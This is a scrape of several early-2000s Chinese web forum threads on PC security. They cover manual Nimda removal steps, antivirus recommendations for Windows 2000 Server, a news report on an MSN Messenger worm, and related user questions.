Blueidea Web Team
Moderator Of Dreamweaver & Javascript
我的网站改版啦！==>vnv2
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-18 20:23:19 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在汉化新世纪网站里面有专门杀Nimda的Norton工具

::古落根门::

唯有不断学习 才能不断进步

cjj31

方与圆
积分：3191
发帖：1148
来自：乡下
注册：2000-07-05
 发表于 2002-01-18 20:27:33 按此观看cjj31的个人资料 按此发邮件给cjj31 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
Windows Nt/2000/XP的手工清除方法

    1、结束其中进程名称为“xxx.tmp.exe”以及“Load.exe”的进程(xxx为任意文件名)

    2、删除系统temp文件夹中文件长度为57344的文件

    3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe

    4、打开System.ini文件，在[load]中如果有一行“shell=explorer.exe load.exe -dontrunold”，则改为“shell=explorer.exe”

    5、在硬盘区的根目录下寻找Admin.DLL文件，如果在根目录下存在该文件，则删除它

    6、打开“控制面板|用户和密码”，将Administrator组中的guest帐号删除

    7、把C盘的完全共享取消掉

    8、搜索整个硬盘，把所有readme.eml的文件删除，这时在你没有对系统进行免疫修复前，请不要点击任何readme.eml文件，用ctrl+A选取全部readme.eml文件，删除掉，如果单击了单个readme.eml文件，NIMDA病毒病毒将利用你的系统漏洞重新运行。

    Win9X/Me的手工清除方法

    1、重启操作系统进入到安全模式

    2、删除系统temp文件夹中文件长度为57344的文件

    3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe

    4、打开System.ini文件，在[load]中如果有一行“shell=explorer.exe load.exe -dontrunold”，则改为“shell=explorer.exe”

    5、把C盘的完全共享取消掉

    6、搜索整个硬盘，把所有readme.eml的文件删除，这时在你没有对系统进行免疫修复前，请不要点击任何readme.eml文件，用ctrl+A选取全部readme.eml文件，删除掉，如果单击了单个readme.eml文件，NIMDA病毒病毒将利用你的系统漏洞重新运行。

    尽管这时候你已经清除了NIMDA病毒病毒，但是如果你不对你的系统进行免疫修复的话，你很快会受到新的NIMDA病毒病毒攻击，因为NIMDA病毒病毒的传播复制能力非常强，所以只有你的系统还存在漏洞，你就十分有可能重新再感染上NIMDA病毒病毒，所以天网安全实验室推出了NIMDA病毒病毒免疫方案：

    1、打上微软官方的补丁SP2

    微软官方已经就WINDOWS2000系统目前发现的漏洞做了个“十全大补”的补丁，可以弥补绝大部分的win2000漏洞。SP2共100M左右，可以到以下网址下载：

    http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

    这个补丁恐怕对大多数用户来说是不可能的，100M的文件下载实在太慢了。

    2、使用天网个人版防火墙的修补程序

    在天网个人版防火墙中，提供了包括IE漏洞的天网安全检测修补系统，可以检查出WINDOWS中严重的系统漏洞，并自动修复它。目前的天网个人版(测试版)中所带的漏洞检测与修复系统已经可以检查和修复NIMDA病毒病毒赖以传染和传播的IE浏览器漏洞，所以对于防护NIMDA病毒病毒而言，是一个不可多得的顺手工具。经过了漏洞检测与修复系统修复之后的系统，NIMDA病毒病毒就无法直接在用户的机器上自动运行了。

    另外建议将WSH(Windows Scripting Host)功能删除可预防此类病毒的破坏。

    其步骤是：

    "开始"->"设置"->"控制面版"->"添加删除程序"-〉"WINDOWS按装程序"-〉"附件"，在"组件"中的"Windows scripting Host"(约占空间1.1MB)，去掉选择，选"确定"即可，不过这样可能会影响一些功能。

好好学习，天天向上
交友：MSN:cjj8110@hotmail.com
技术交流：OICQ:7777435
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-18 20:31:10 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
WSH最好还是不删啊

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：nimada怎么杀干净？？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


能在Win2000服务器版本上运行的杀毒软件有哪些？ - 经 典 论 坛

计算机技术
能在Win2000服务器版本上运行的杀毒软件有哪些？

上一贴 | 下一贴
发表人 主题: 能在Win2000服务器版本上运行的杀毒软件有哪些？
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 23:16:22 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
今天做系统，发现NAv不可以，可怜我一直用啊
金山的太吃内存，也不好
其他还有什么比较好的吗？

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-17 23:17:37 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
我个人认为诺顿是最理想的！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 23:25:57 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
就是不能用才过来发贴问的啊

::古落根门::

唯有不断学习 才能不断进步

dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-17 23:28:04 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
说句实在话，我不知道怎么说，因为我的NAV能用,不是2002版,是7.61.928.

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 23:42:32 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
是吗？那太好了，我的就是2002不能安装在高级服务器上
我试试

::古落根门::

唯有不断学习 才能不断进步

seaice

超级用户
积分：450
发帖：119
来自：
注册：2002-02-09
 发表于 2002-02-18 00:08:19 按此观看seaice的个人资料 按此发邮件给seaice seaice 的 oicq 是6439755,查看 6439755 的资料 发送悄悄话给seaice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看seaice的IP
用KV3000升级很方便的·
功能也很不错·连恶性的网页都可以查出来·
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-18 10:18:17 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
试了吗？
是不是版本的问题？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-18 20:02:35 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
norton 2002 是针对个人用户的

nace7.x 是企业版,能很好的支持 win2k sev,网络管理,安装,而且木有 365 天的更新限制

木有签名#@$%
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-18 21:43:33 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
NAV能用，我一直在用，不过NAV200X在服务器版上的确不稳定，还是7.X企业版好

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-19 10:13:23 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
piety在上个帖子中说
引用:
NAV能用，我一直在用，不过NAV200X在服务器版上的确不稳定，还是7.X企业版好

nav200x 根本在 sev 上装不了,那来的不稳定???

木有签名#@$%
五十岚

初级用户
积分：20
发帖：3
来自：
注册：2001-08-21
 发表于 2002-02-19 10:23:28 按此观看五十岚的个人资料 按此发邮件给五十岚 五十岚 的 oicq 是6985483,查看 6985483 的资料 发送悄悄话给五十岚 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看五十岚的IP
NAV2001 ver7.00.51f 在win2000 adv 下也能用的。
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-02-19 10:51:38 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
诺顿的企业版能用而且很不错啊~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-19 11:35:12 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
norton企业版（含server及client版）目前版本好像7.6
建议首选

等我想想再签
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-19 12:45:30 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
我也知道企业版能用啊，可是money........:)
BIGBUG，是的7.6是最新版本

::古落根门::

唯有不断学习 才能不断进步

BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-19 15:27:22 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
ImHow在上个帖子中说
引用:
我也知道企业版能用啊，可是money........
BIGBUG，是的7.6是最新版本

收邮件

等我想想再签
上一贴 | 下一贴
快速回复 主题：能在Win2000服务器版本上运行的杀毒软件有哪些？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


MSN Messenger病毒 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
MSN Messenger病毒

上一贴 | 下一贴
发表人 主题: MSN Messenger病毒
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-20 18:54:05 wx@ay 的 oicq 是1850777,查看 1850777 的资料 收藏该主题供以后查看 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
安全专家警告：微软MSN Messenger被虫蛀了

安全专家警告称，周三下午发现了一种利用了IE浏览器中安全缺陷的蠕虫病毒，该病毒目前正在互联网上快速传播。它通过向其他的MSN Messenger用户发送消息进行传播，但不会对用户的PC造成伤害。

这种名字为JS/Exploit-Messenger的病毒利用了IE浏览器中的一处安全缺陷。微软在2月11日公布了该安全缺陷，并同时发布了相应的补丁程序。这一安全缺陷使得IE能够自动地执行嵌入在网页中的恶意JavaScript代码。

有几个网站上的恶意代码能够使IE创建MSN Messenger消息，并将它发送给MSN Messenger的好友。消息中包含有一个指向包含恶意代码的网站的链接，消息的内容为“Hey go to (link) plz”（请指向该链接）或“Go to (link) NoW!!!”（现在指向该链接）。

据反病毒公司称，含有恶意代码的几个网站已经被关闭，由于是通过MSN Messenger这一用户群庞大的即时消息软件进行传播的，因此其传播速度相当地快，但它不可能感染大量的用户。

安全专家指出，由于即时消息的传播速度远大于电子邮件，因此即时消息型蠕虫病毒的传播速度要远快于电子邮件型病毒。尽管JavaScript代码的危害性并不大，但如果与其他的工具相结合，它也能够给用户的PC造成较严重的伤害。

据悉，这一病毒可能与去年12月份为警告IE浏览器中存在的安全缺陷的危害性而进行的演示有关。大多数的反病毒软件公司已经升级了反病毒工具，使之能够查杀JS/Exploit-Messenger病毒。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-20 19:28:59 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
还好我在XP里面讲那个东西卸载掉了！呵呵……不过功能还是挺强的。

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-20 20:20:33 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
一向以为它很安全。。。（汗）

{ KUka ALl wAYs wITh yOU }
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-21 23:25:38 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
高手总是有的，绝对安全的是没有的，呵呵

::古落根门::

唯有不断学习 才能不断进步

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-22 09:41:36 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
随后 M$ 出了个 IE 的补丁, messenger 也升级到 0076

木有签名#@$%
上一贴 | 下一贴
快速回复 主题：MSN Messenger病毒
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


win98 的系统问题！求助 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
win98 的系统问题！求助

上一贴 | 下一贴
发表人 | 主题: win98 的系统问题！求助
touchly 高级用户 积分：260 发帖：73 来自：中国北京 注册：2002-03-06 | 发表于 2002-03-12 10:22:01 按此观看touchly的个人资料 按此发邮件给touchly touchly 的 oicq 是10415234,查看 10415234 的资料 收藏该主题供以后查看 发送悄悄话给touchly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看touchly的IP 我的win98相当不稳定经常出现提示(kernelsys32 该程序执行了非法操作） 也杀过毒没发现病毒。如不重装系统还有什么方法？ ぁりがどぅ
程程 终级用户 积分：753 发帖：202 来自：上海 注册：2000-10-31 | 发表于 2002-03-12 10:30:54 按此观看程程的个人资料 按此发邮件给程程 访问程程的主页 程程 的 oicq 是178438,查看 178438 的资料 发送悄悄话给程程 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看程程的IP 找到这个文件所属的软件，删除软件或重新安装此软件。 这个不是病毒的关系，其实可能是某些不成熟软件引起的。 创意+技术=艺术
touchly 高级用户 积分：260 发帖：73 来自：中国北京 注册：2002-03-06 | 发表于 2002-03-12 11:09:04 按此观看touchly的个人资料 按此发邮件给touchly touchly 的 oicq 是10415234,查看 10415234 的资料 发送悄悄话给touchly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看touchly的IP kernelsys32 是不是系统文件呀？ 我遇到这个问题时出现提示但不死机！ 我怎么才能查到这个文件所属的软件呀？ ぁりがどぅ
JILL 终级用户 积分：590 发帖：180 来自：沈阳市 注册：2001-12-10 | 发表于 2002-03-12 12:33:35 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP 是系统盘不好吧 换一张安装光盘 誓与WIN2000共存
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-03-12 14:44:05 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 从别的98下复制同名文件覆盖 ::古落根门:: 唯有不断学习 才能不断进步
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-03-12 19:31:50 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 或者从安装盘复制一个回来 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
zb 初级用户 积分：144 发帖：40 来自：china 注册：2001-02-14 | 发表于 2002-03-12 19:40:50 按此观看zb的个人资料 按此发邮件给zb zb 的 oicq 是52246568,查看 52246568 的资料 发送悄悄话给zb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zb的IP ありがどう&#65379;你打错了 好朋友简简单单,好情意清清爽爽,好缘分久久长长.
touchly 高级用户 积分：260 发帖：73 来自：中国北京 注册：2002-03-06 | 发表于 2002-03-14 14:18:13 按此观看touchly的个人资料 按此发邮件给touchly touchly 的 oicq 是10415234,查看 10415234 的资料 发送悄悄话给touchly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看touchly的IP 谢谢提示 ぁりがどぅ
touchly 高级用户 积分：260 发帖：73 来自：中国北京 注册：2002-03-06 | 发表于 2002-03-14 14:25:47 按此观看touchly的个人资料 按此发邮件给touchly touchly 的 oicq 是10415234,查看 10415234 的资料 发送悄悄话给touchly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看touchly的IP 我找到解决办法了是因为我的机器中了一种新病毒(蠕虫变种)升级了杀毒盘就好了. ぁりがどぅ
上一贴 | 下一贴
快速回复 主题：win98 的系统问题！求助
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


有人一直在扫描我机器的端口，怎么回事？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
有人一直在扫描我机器的端口，怎么回事？

上一贴 | 下一贴
发表人 | 主题: 有人一直在扫描我机器的端口，怎么回事？
Bobofu 终级用户 积分：475 发帖：425 来自：北京 注册：2000-09-01 | 发表于 2001-12-26 16:30:30 按此观看Bobofu的个人资料 按此发邮件给Bobofu Bobofu 的 oicq 是6376850,查看 6376850 的资料 收藏该主题供以后查看 发送悄悄话给Bobofu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Bobofu的IP 已经数次扫描我的机器端口了，我该怎么办呢？ [这消息被Bobofu编辑过(编辑时间2001-12-26 16:33:54)] 人生，充满取舍......
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-26 21:15:11 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 其实不用很害怕。呵呵。天网报告是很正常的事。不见得是攻击。 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
yuzhiqing 终级用户 积分：747 发帖：439 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-27 00:11:42 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 大多是接受收据的 WINDFLASH ::浅紫色FORUM::
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-27 01:13:28 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 扫描而已 你只要是上网就肯定会被扫描 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 主题：有人一直在扫描我机器的端口，怎么回事？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请问，怎么关闭WinXP自带的防火墙？ - 经 典 论 坛

计算机技术
请问，怎么关闭WinXP自带的防火墙？

上一贴 | 下一贴
发表人 | 主题: 请问，怎么关闭WinXP自带的防火墙？
洋葱 高级用户 积分：249 发帖：68 来自： 注册：2002-02-03 | 发表于 2002-03-02 11:42:48 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 收藏该主题供以后查看 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP 如题~~~~ 我是一只菜菜鸟，不要嫌我麻烦啊~~~
话草 终级用户 积分：688 发帖：223 来自： 注册：2001-08-07 | 发表于 2002-03-02 11:56:26 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP 打开你的拨号属性，高级选项 ， 其中第一项就是你的 防火墙功能选择 ，你可以去掉钩选，即可关闭它
洋葱 高级用户 积分：249 发帖：68 来自： 注册：2002-02-03 | 发表于 2002-03-02 12:25:15 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP 谢谢啊~~~~ ：） 我没找到“拨号属性”啊~~~ [这消息被洋葱编辑过(编辑时间2002-03-02 14:41:10)] 我是一只菜菜鸟，不要嫌我麻烦啊~~~
话草 终级用户 积分：688 发帖：223 来自： 注册：2001-08-07 | 发表于 2002-03-02 16:23:05 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP 双击你的拨号链接（右下角任务栏的 通知区域显示图标 ） ，你会看到“属性” 一项，点选，接下来操作如上
洋葱 高级用户 积分：249 发帖：68 来自： 注册：2002-02-03 | 发表于 2002-03-02 18:48:58 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP 收到！ 谢谢！！ 我是一只菜菜鸟，不要嫌我麻烦啊~~~
上一贴 | 下一贴
快速回复 主题：请问，怎么关闭WinXP自带的防火墙？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


有谁能够介绍一下 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
有谁能够介绍一下

上一贴 | 下一贴
发表人 主题: 有谁能够介绍一下
fellow

Fellow
积分：3698
发帖：1067
来自：sd.gd.cn
注册：2001-02-20
 发表于 2002-02-18 01:22:01 按此观看fellow的个人资料 按此发邮件给fellow fellow 的 oicq 是5144255,查看 5144255 的资料 收藏该主题供以后查看 发送悄悄话给fellow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fellow的IP
服务器防火墙软件，不是天网那种个人的。
我对这方面一无所知。

Xp The Future 3
还是那句：学师三日，天下无敌；学师三年，寸步难行。
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-18 01:24:51 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
用诺顿网络安全特警，高端服务器上我一直用着，很不错。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

because

终级用户
积分：504
发帖：393
来自：深圳
注册：2000-12-09
 发表于 2002-02-18 05:07:38 按此观看because的个人资料 按此发邮件给because 访问because的主页 because 的 oicq 是791321,查看 791321 的资料 发送悄悄话给because 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看because的IP
ME TOO！
你会发现它的强大的地方的！

智者无忧，勇者无惧，仁者无愧，霸者无恤
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
